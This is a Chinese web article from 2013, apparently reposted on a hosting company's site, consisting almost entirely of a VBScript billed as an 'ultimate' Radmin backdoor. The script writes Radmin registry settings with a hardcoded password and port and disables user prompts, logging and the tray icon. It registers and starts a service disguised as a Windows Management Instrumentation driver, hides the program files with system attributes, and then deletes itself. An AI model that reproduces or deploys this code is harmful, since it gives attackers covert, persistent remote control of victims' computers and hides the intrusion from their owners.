Vbs脚本实现radmin终极后门代码_删除自身
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
复制代码 代码如下: onerrorresumenext constHKEY_LOCAL_MACHINE=&H80000002 strComputer="." SetStdOut=WScript.StdOut SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&_ strComputer&"\root\default:StdRegProv") strKeyPath="SYSTEM\RAdmin" oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath strKeyPath="SYSTEM\RAdmin\v2.0" oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath strKeyPath="SYSTEM\RAdmin\v2.0\Server" oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath strKeyPath="SYSTEM\RAdmin\v2.0\Server\iplist" oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath strKeyPath="SYSTEM\RAdmin\v2.0\Server\Parameters" oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath SetobjRegistry=GetObject("Winmgmts:root\default:StdRegProv") strPath="SYSTEM\RAdmin\v2.0\Server\Parameters" uBinary=Array(0,0,0,0) Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) uBinary=Array(0,0,0,0) Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) uBinary=Array(1,0,0,0) Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) uBinary=Array(0,0,0,0) Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary) uBinary=Array(0,0,0,0) Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) uBinary=Array(0,0,0,0) Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) uBinary=Array(0,0,0,0) Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) uBinary=Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)//此为注册表导出十六进制转为十进制数据pass:241241241 Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)//Radmin密码 uBinary=Array(5,4,0,0)//端口:1029 Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) uBinary=Array(10,0,0,0) Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&strComputer&"\root\default:StdRegProv") strKeyPath="SYSTEM\RAdmin\v2.0\Server\Parameters" strValueName="LogFilePath" strValue="c:\logfile.txt" setwshshell=createobject("wscript.shell") a=wshshell.run("sc.execreateWinManageHelpbinpath=%systemroot%\system32\Exporer.exestart=auto",0) oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&strComputer&"\root\default:StdRegProv") strKeyPath="SYSTEM\ControlSet001\Services\WinManageHelp" strValueName="Description" strValue="WindowsMediaPlayerWindowsManagementInstrumentationPlayerDrivers." oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName="DisplayName" strValue="WindowsManagementInstrumentationPlayerDrivers" oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName="ImagePath" strValue="c:\windows\system32\Exporer.exe/service" oReg.SetExpandedStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue setwshshell=createobject("wscript.shell") a=wshshell.run("netstartWinManageHelp",0) b=wshshell.run("attrib+r+h+s%systemroot%\system32\exporer.exe",0) c=wshshell.run("attrib+r+h+s%systemroot%\system32\AdmDll.dll",0) d=wshshell.run("attrib+r+h+s%systemroot%\system32\raddrv.dll",0) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)//自删除 最 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: vbs复制文件的脚本下一篇: VBS脚本加密/解密VBS脚本(简易免杀版1.1)
关于Vbs脚本实现radmin终极后门代码_删除自身的所有评论